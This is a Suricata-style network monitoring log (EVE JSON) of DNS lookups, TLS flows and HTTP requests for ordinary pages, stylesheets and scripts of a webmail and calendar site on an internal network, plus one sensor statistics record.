{"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:15.000259+0000","flow_id":1436373150435366,"event_type":"flow","src_ip":"192.168.10.130","src_port":34294,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3992,"bytes_toclient":16373,"start":"2020-02-29T00:25:09.690214+0000","end":"2020-02-29T00:25:14.727805+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:15.158192+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} 
{"timestamp":"2020-02-29T00:26:16.000361+0000","flow_id":1992601480049501,"event_type":"flow","src_ip":"192.168.10.130","src_port":34298,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":2028,"bytes_toclient":3463,"start":"2020-02-29T00:25:09.701277+0000","end":"2020-02-29T00:25:14.750566+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001230+0000","flow_id":235487409740482,"event_type":"flow","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6225,"start":"2020-02-29T00:25:12.465602+0000","end":"2020-02-29T00:25:17.888501+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001636+0000","flow_id":1098183115353279,"event_type":"flow","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:17.208063+0000","end":"2020-02-29T00:21:17.319419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:19.656142+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:26:19.667468+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44728,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32226,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:19.913180+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491}} 
{"timestamp":"2020-02-29T00:26:19.955751+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:26:19.958220+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:26:19.961103+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} 
{"timestamp":"2020-02-29T00:26:19.966016+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} {"timestamp":"2020-02-29T00:26:19.968061+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:26:19.969853+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":3}} 
{"timestamp":"2020-02-29T00:26:19.971829+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:26:19.973668+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":4}} {"timestamp":"2020-02-29T00:26:19.974070+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} 
{"timestamp":"2020-02-29T00:26:19.976662+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":5}} {"timestamp":"2020-02-29T00:26:19.978233+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:26:19.987537+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":6}} {"timestamp":"2020-02-29T00:26:19.998674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.000847+0000","event_type":"stats","stats":{"uptime":15232,"capture":{"kernel_packets":141740,"kernel_drops":0},"decoder":{"pkts":141750,"bytes":97361929,"invalid":195,"ipv4":140159,"ipv6":10,"ethernet":141750,"raw":0,"null":0,"sll":0,"tcp":134579,"udp":5370,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2910,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2926,"synack":2917,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"al
ert":26},"app_layer":{"flow":{"http":1917,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2456,"failed_udp":116},"tx":{"http":4976,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2540}},"flow_mgr":{"closed_pruned":2888,"new_pruned":17,"est_pruned":2544,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":4,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":86812,"memcap":0}}} {"timestamp":"2020-02-29T00:26:20.001315+0000","flow_id":1303568466127980,"event_type":"flow","src_ip":"192.168.10.130","src_port":34286,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":35,"pkts_toclient":61,"bytes_toserver":3699,"bytes_toclient":80638,"start":"2020-02-29T00:25:01.732268+0000","end":"2020-02-29T00:25:06.784171+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001608+0000","flow_id":331982439825668,"event_type":"flow","src_ip":"192.168.10.130","src_port":34300,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1292,"bytes_toclient":719,"start":"2020-02-29T00:25:09.704772+0000","end":"2020-02-29T00:25:15.702759+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:26:20.001680+0000","flow_id":922484608450970,"event_type":"flow","src_ip":"192.168.10.130","src_port":34302,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2110,"bytes_toclient":1988,"start":"2020-02-29T00:25:09.704922+0000","end":"2020-02-29T00:25:16.392611+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001745+0000","flow_id":1539237617182180,"event_type":"flow","src_ip":"192.168.10.130","src_port":34296,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":3711,"start":"2020-02-29T00:25:09.697828+0000","end":"2020-02-29T00:25:14.727346+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.000326+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} 
{"timestamp":"2020-02-29T00:26:20.000682+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:26:20.005962+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.007455+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} 
{"timestamp":"2020-02-29T00:26:20.008209+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.008619+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:26:20.011114+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} 
{"timestamp":"2020-02-29T00:26:20.011607+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:26:20.011912+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:26:20.013306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":3}} 
{"timestamp":"2020-02-29T00:26:20.013612+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:26:20.029529+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":8}} {"timestamp":"2020-02-29T00:26:20.031054+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.036805+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:26:20.039089+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":4}} 